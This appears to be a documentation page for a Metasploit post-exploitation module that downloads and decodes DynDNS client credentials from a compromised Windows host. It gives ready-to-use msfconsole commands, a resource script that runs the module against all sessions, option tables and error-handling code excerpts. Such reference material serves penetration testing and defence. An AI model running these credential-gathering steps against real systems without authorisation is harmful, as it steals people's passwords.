Windows Gather DynDNS Client Password Extractor - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/dyndns metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather DynDNS Client Password Extractor
Module: post/windows/gather/credentials/dyndns
Source code: modules/post/windows/gather/credentials/dyndns.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module extracts the username, password, and hosts for DynDNS version 4.1.8. This is done by downloading the config.dyndns file from the victim machine, and then automatically decode the password field. The original copy of the config file is also saved to disk.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/dyndns

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/dyndns
msf post(dyndns) > show options
    ... show and set options ...
msf post(dyndns) > set SESSION session-id
msf post(dyndns) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/dyndns")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/dyndns post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/dyndns

msf6 post(windows/gather/credentials/dyndns) > show info

       Name: Windows Gather DynDNS Client Password Extractor
     Module: post/windows/gather/credentials/dyndns
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Shubham Dawra <[email protected]>
  sinn3r <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module extracts the username, password, and hosts for DynDNS 
  version 4.1.8. This is done by downloading the config.dyndns file 
  from the victim machine, and then automatically decode the password 
  field. The original copy of the config file is also saved to disk.

Module Options


This is a complete list of options available in the windows/gather/credentials/dyndns post exploitation module:

msf6 post(windows/gather/credentials/dyndns) > show options

Module options (post/windows/gather/credentials/dyndns):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/dyndns post exploitation module:

msf6 post(windows/gather/credentials/dyndns) > show advanced

Module advanced options (post/windows/gather/credentials/dyndns):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/dyndns module can do:

msf6 post(windows/gather/credentials/dyndns) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/dyndns post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/dyndns) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

No config file found, will not continue


Here is a relevant code snippet related to the "No config file found, will not continue" error message:

168:	  #
169:	  def run
170:	    # Find the config file
171:	    config_file = get_config_file
172:	    if config_file.nil?
173:	      print_error("No config file found, will not continue")
174:	      return
175:	    end
176:	
177:	    # Load the config file
178:	    print_status("Downloading config.dyndns...")

Config file seems empty, will not continue


Here is a relevant code snippet related to the "Config file seems empty, will not continue" error message:

177:	    # Load the config file
178:	    print_status("Downloading config.dyndns...")
179:	    content = load_config_file(config_file)
180:	
181:	    if content.empty?
182:	      print_error("Config file seems empty, will not continue")
183:	      return
184:	    end
185:	
186:	    # Get parsed data
187:	    config = parse_config(content)

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Shubham Dawra <shubham2dawra[at]gmail.com>
  • sinn3r

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.